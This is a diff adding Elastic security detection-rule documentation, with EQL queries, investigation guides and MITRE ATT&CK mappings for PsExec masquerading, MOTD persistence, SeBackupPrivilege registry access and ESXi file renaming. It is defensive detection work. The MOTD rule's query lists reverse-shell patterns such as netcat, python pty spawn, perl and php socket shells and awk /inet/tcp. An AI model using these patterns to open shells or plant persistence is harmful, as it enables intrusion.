+---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.pe.original_file_name : "psexesvc.exe" and not process.name : "PSEXESVC.exe" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: System Services +** ID: T1569 +** Reference URL: https://attack.mitre.org/techniques/T1569/ +* Sub-technique: +** Name: Service Execution +** ID: T1569.002 +** Reference URL: https://attack.mitre.org/techniques/T1569/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Rename System Utilities +** ID: T1036.003 +** Reference URL: https://attack.mitre.org/techniques/T1036/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-process-spawned-from-motd-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-process-spawned-from-motd-detected.asciidoc new file mode 100644 index 0000000000..3af40191bb --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-process-spawned-from-motd-detected.asciidoc @@ -0,0 +1,152 @@ +[[prebuilt-rule-8-10-5-suspicious-process-spawned-from-motd-detected]] +=== Suspicious Process Spawned from MOTD Detected + +Message of the day (MOTD) is the message that is presented to the user when a user connects to a Linux server via SSH or a serial connection. Linux systems contain several default MOTD files located in the "/etc/update-motd.d/" and "/usr/lib/update-notifier/" directories. These scripts run as the root user every time a user connects over SSH or a serial connection. Adversaries may create malicious MOTD files that grant them persistence onto the target every time a user connects to the system by executing a backdoor script or command. This rule detects the execution of potentially malicious processes through the MOTD utility. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#10-boot-or-logon-initialization-scripts-motd + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Endgame +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 6 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Suspicious Process Spawned from MOTD Detected + +The message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux. + +Attackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Files in these directories will automatically run with root privileges when they are made executable. + +This rule identifies the execution of potentially malicious processes from a MOTD script, which is not likely to occur as default benign behavior. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. +> This investigation guide uses {security-guide}/security/current/osquery-placeholder-fields.html[placeholder fields] to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run. + +#### Possible Investigation Steps + +- Investigate the file that was created or modified from which the suspicious process was executed. + - !{osquery{"label":"Osquery - Retrieve File Information","query":"SELECT * FROM file WHERE path = {{file.path}}"}} +- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered. + - !{osquery{"label":"Osquery - Retrieve File Listing Information","query":"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')"}} + - !{osquery{"label":"Osquery - Retrieve Additional File Listing Information","query":"SELECT\n f.path,\n u.username AS file_owner,\n g.groupname AS group_owner,\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\n datetime(f.btime, 'unixepoch') AS file_created_time,\n f.size AS size_bytes\nFROM\n file f\n LEFT JOIN users u ON f.uid = u.uid\n LEFT JOIN groups g ON f.gid = g.gid\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\n"}} +- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations. + - !{osquery{"label":"Osquery - Retrieve Running Processes by User","query":"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username"}} +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. + - If scripts or executables were dropped, retrieve the files and determine if they are malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - Check if the domain is newly registered or unexpected. + - Check the reputation of the domain or IP address. + - File access, modification, and creation activities. + - Cron jobs, services, and other persistence mechanisms. + - !{osquery{"label":"Osquery - Retrieve Crontab Information","query":"SELECT * FROM crontab"}} + +### Related Rules + +- Potential Persistence Through MOTD File Creation Detected - 96d11d31-9a79-480f-8401-da28b194608f + +### False positive analysis + +- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Delete the MOTD files or restore them to the original configuration. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where event.type == "start" and event.action : ("exec", "exec_event") and +process.parent.executable : ("/etc/update-motd.d/*", "/usr/lib/update-notifier/*") and ( + (process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and ( + (process.args : ("-i", "-l")) or (process.parent.name == "socat" and process.parent.args : "*exec*"))) or + (process.name : ("nc", "ncat", "netcat", "nc.openbsd") and process.args_count >= 3 and + not process.args : ("-*z*", "-*l*")) or + (process.name : "python*" and process.args : "-c" and process.args : ( + "*import*pty*spawn*", "*import*subprocess*call*" + )) or + (process.name : "perl*" and process.args : "-e" and process.args : "*socket*" and process.args : ( + "*exec*", "*system*" + )) or + (process.name : "ruby*" and process.args : ("-e", "-rsocket") and process.args : ( + "*TCPSocket.new*", "*TCPSocket.open*" + )) or + (process.name : "lua*" and process.args : "-e" and process.args : "*socket.tcp*" and process.args : ( + "*io.popen*", "*os.execute*" + )) or + (process.name : "php*" and process.args : "-r" and process.args : "*fsockopen*" and process.args : "*/bin/*sh*") or + (process.name : ("awk", "gawk", "mawk", "nawk") and process.args : "*/inet/tcp/*") or + (process.name in ("openssl", "telnet")) +) and +not (process.parent.args : "--force" or process.args : ("/usr/games/lolcat", "/usr/bin/screenfetch")) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Initialization Scripts +** ID: T1037 +** Reference URL: https://attack.mitre.org/techniques/T1037/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-rdp-activex-client-loaded.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-rdp-activex-client-loaded.asciidoc new file mode 100644 index 0000000000..0bb46c154e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-rdp-activex-client-loaded.asciidoc @@ -0,0 +1,93 @@ +[[prebuilt-rule-8-10-5-suspicious-rdp-activex-client-loaded]] +=== Suspicious RDP ActiveX Client Loaded + +Identifies suspicious Image Loading of the Remote Desktop Services ActiveX Client (mstscax), this may indicate the presence of RDP lateral movement capability. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +any where host.os.type == "windows" and + (event.category : ("library", "driver") or (event.category == "process" and event.action : "Image loaded*")) and + (dll.name : "mstscax.dll" or file.name : "mstscax.dll") and + /* depending on noise in your env add here extra paths */ + process.executable : + ( + "C:\\Windows\\*", + "C:\\Users\\Public\\*", + "C:\\Users\\Default\\*", + "C:\\Intel\\*", + "C:\\PerfLogs\\*", + "C:\\ProgramData\\*", + "\\Device\\Mup\\*", + "\\\\*" + ) and + /* add here FPs */ + not process.executable : ("C:\\Windows\\System32\\mstsc.exe", "C:\\Windows\\SysWOW64\\mstsc.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: Remote Desktop Protocol +** ID: T1021.001 +** Reference URL: https://attack.mitre.org/techniques/T1021/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-remote-registry-access-via-sebackupprivilege.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-remote-registry-access-via-sebackupprivilege.asciidoc new file mode 100644 index 0000000000..3622d6d106 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-remote-registry-access-via-sebackupprivilege.asciidoc @@ -0,0 +1,126 @@ +[[prebuilt-rule-8-10-5-suspicious-remote-registry-access-via-sebackupprivilege]] +=== Suspicious Remote Registry Access via SeBackupPrivilege + +Identifies remote access to the registry using an account with Backup Operators group membership. This may indicate an attempt to exfiltrate credentials by dumping the Security Account Manager (SAM) registry hive in preparation for credential access and privileges elevation. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-system.* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/mpgn/BackupOperatorToDA +* https://raw.githubusercontent.com/Wh04m1001/Random/main/BackupOperators.cpp +* https://www.elastic.co/security-labs/detect-credential-access + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Tactic: Credential Access +* Resources: Investigation Guide +* Use Case: Active Directory Monitoring +* Data Source: Active Directory + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Suspicious Remote Registry Access via SeBackupPrivilege + +SeBackupPrivilege is a privilege that allows file content retrieval, designed to enable users to create backup copies of the system. Since it is impossible to make a backup of something you cannot read, this privilege comes at the cost of providing the user with full read access to the file system. This privilege must bypass any access control list (ACL) placed in the system. + +This rule identifies remote access to the registry using an account with Backup Operators group membership. This may indicate an attempt to exfiltrate credentials by dumping the Security Account Manager (SAM) registry hive in preparation for credential access and privileges elevation. + +#### Possible investigation steps + +- Identify the user account that performed the action and whether it should perform this kind of action. +- Investigate the activities done by the subject user the login session. The field `winlog.event_data.SubjectLogonId` can be used to get this data. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate abnormal behaviors observed by the subject user such as network connections, registry or file modifications, and processes created. +- Investigate if the registry file was retrieved or exfiltrated. + +### False positive analysis + +- If this activity is expected and noisy in your environment, benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Limit or disable the involved user account to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by winlog.computer_name, winlog.event_data.SubjectLogonId with maxspan=1m + [iam where event.action == "logged-in-special" and + winlog.event_data.PrivilegeList : "SeBackupPrivilege" and + + /* excluding accounts with existing privileged access */ + not winlog.event_data.PrivilegeList : "SeDebugPrivilege"] + [any where event.action == "Detailed File Share" and winlog.event_data.RelativeTargetName : "winreg"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: Security Account Manager +** ID: T1003.002 +** Reference URL: https://attack.mitre.org/techniques/T1003/002/ +* Sub-technique: +** Name: LSA Secrets +** ID: T1003.004 +** Reference URL: https://attack.mitre.org/techniques/T1003/004/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-renaming-of-esxi-files.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-renaming-of-esxi-files.asciidoc new file mode 100644 index 0000000000..9fdc3d4596 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-renaming-of-esxi-files.asciidoc @@ -0,0 +1,67 @@ +[[prebuilt-rule-8-10-5-suspicious-renaming-of-esxi-files]] +=== Suspicious Renaming of ESXI Files + +Identifies instances where VMware-related files, such as those with extensions like ".vmdk", ".vmx", ".vmxf", ".vmsd", ".vmsn", ".vswp", ".vmss", ".nvram", and ".vmem", are renamed on a Linux system. The rule monitors for the "rename" event action associated with these file types, which could indicate malicious activity. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and event.action == "rename" and +file.Ext.original.name : ("*.vmdk", "*.vmx", "*.vmxf", "*.vmsd", "*.vmsn", "*.vswp", "*.vmss", "*.nvram", "*.vmem") +and not file.name : ("*.vmdk", "*.vmx", "*.vmxf", "*.vmsd", "*.vmsn", "*.vswp", "*.vmss", "*.nvram", "*.vmem") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Rename System Utilities +** ID: T1036.003 +** Reference URL: https://attack.mitre.org/techniques/T1036/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-renaming-of-esxi-index-html-file.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-renaming-of-esxi-index-html-file.asciidoc new file mode 100644 index 0000000000..62a30d6a19 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-renaming-of-esxi-index-html-file.asciidoc @@ -0,0 +1,66 @@ +[[prebuilt-rule-8-10-5-suspicious-renaming-of-esxi-index-html-file]] +=== Suspicious Renaming of ESXI index.html File + +Identifies instances where the "index.html" file within the "/usr/lib/vmware/*" directory is renamed on a Linux system. The rule monitors for the "rename" event action associated with this specific file and path, which could indicate malicious activity. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and event.action == "rename" and file.name : "index.html" and +file.Ext.original.path : "/usr/lib/vmware/*" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Rename System Utilities +** ID: T1036.003 +** Reference URL: https://attack.mitre.org/techniques/T1036/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-script-object-execution.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-script-object-execution.asciidoc new file mode 100644 index 0000000000..3b45932328 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-script-object-execution.asciidoc @@ -0,0 +1,85 @@ +[[prebuilt-rule-8-10-5-suspicious-script-object-execution]] +=== Suspicious Script Object Execution + +Identifies scrobj.dll loaded into unusual Microsoft processes. This usually means a malicious scriptlet is being executed in the target process. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id with maxspan=2m + [process where host.os.type == "windows" and event.type == "start" + and (process.code_signature.subject_name in ("Microsoft Corporation", "Microsoft Windows") and + process.code_signature.trusted == true) and + not process.executable : ( + "?:\\Windows\\System32\\cscript.exe", + "?:\\Windows\\SysWOW64\\cscript.exe", + "?:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", + "?:\\Program Files\\Internet Explorer\\iexplore.exe", + "?:\\Windows\\SystemApps\\Microsoft.MicrosoftEdge_*\\MicrosoftEdge.exe", + "?:\\Windows\\system32\\msiexec.exe", + "?:\\Windows\\SysWOW64\\msiexec.exe", + "?:\\Windows\\System32\\smartscreen.exe", + "?:\\Windows\\system32\\taskhostw.exe", + "?:\\windows\\system32\\inetsrv\\w3wp.exe", + "?:\\windows\\SysWOW64\\inetsrv\\w3wp.exe", + "?:\\Windows\\system32\\wscript.exe", + "?:\\Windows\\SysWOW64\\wscript.exe", + "?:\\Windows\\system32\\mobsync.exe", + "?:\\Windows\\SysWOW64\\mobsync.exe", + "?:\\Windows\\System32\\cmd.exe", + "?:\\Windows\\SysWOW64\\cmd.exe")] + [library where host.os.type == "windows" and event.type == "start" and dll.name : "scrobj.dll"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Regsvr32 +** ID: T1218.010 +** Reference URL: https://attack.mitre.org/techniques/T1218/010/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-startup-shell-folder-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-startup-shell-folder-modification.asciidoc new file mode 100644 index 0000000000..c745df82d2 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-startup-shell-folder-modification.asciidoc @@ -0,0 +1,152 @@ +[[prebuilt-rule-8-10-5-suspicious-startup-shell-folder-modification]] +=== Suspicious Startup Shell Folder Modification + +Identifies suspicious startup shell folder modifications to change the default Startup directory in order to bypass detections monitoring file creation in the Windows Startup folder. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Suspicious Startup Shell Folder Modification + +Techniques used within malware and by adversaries often leverage the Windows registry to store malicious programs for persistence. Startup shell folders are often targeted as they are not as prevalent as normal Startup folder paths so this behavior may evade existing AV/EDR solutions. These programs may also run with higher privileges which can be ideal for an attacker. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Review the source process and related file tied to the Windows Registry entry. +- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the file using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + +### False positive analysis + +- There is a high possibility of benign legitimate programs being added to shell folders. This activity could be based on new software installations, patches, or other network administrator activity. Before undertaking further investigation, it should be verified that this activity is not benign. + +### Related rules + +- Startup or Run Key Registry Modification - 97fc44d3-8dae-4019-ae83-298c3015600f +- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- If the malicious file was delivered via phishing: + - Block the email sender from sending future emails. + - Block the malicious web pages. + - Remove emails from the sender from mailboxes. + - Consider improvements to the security awareness program. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and + registry.path : ( + "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Common Startup", + "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Common Startup", + "HKEY_USERS\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup", + "HKEY_USERS\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Startup", + "\\REGISTRY\\MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Common Startup", + "\\REGISTRY\\MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Common Startup", + "\\REGISTRY\\USER\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup", + "\\REGISTRY\\USER\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Startup" + ) and + registry.data.strings != null and + /* Normal Startup Folder Paths */ + not registry.data.strings : ( + "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", + "%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", + "%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", + "C:\\Users\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: +** Name: Registry Run Keys / Startup Folder +** ID: T1547.001 +** Reference URL: https://attack.mitre.org/techniques/T1547/001/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-symbolic-link-created.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-symbolic-link-created.asciidoc new file mode 100644 index 0000000000..337ef5bafd --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-symbolic-link-created.asciidoc @@ -0,0 +1,92 @@ +[[prebuilt-rule-8-10-5-suspicious-symbolic-link-created]] 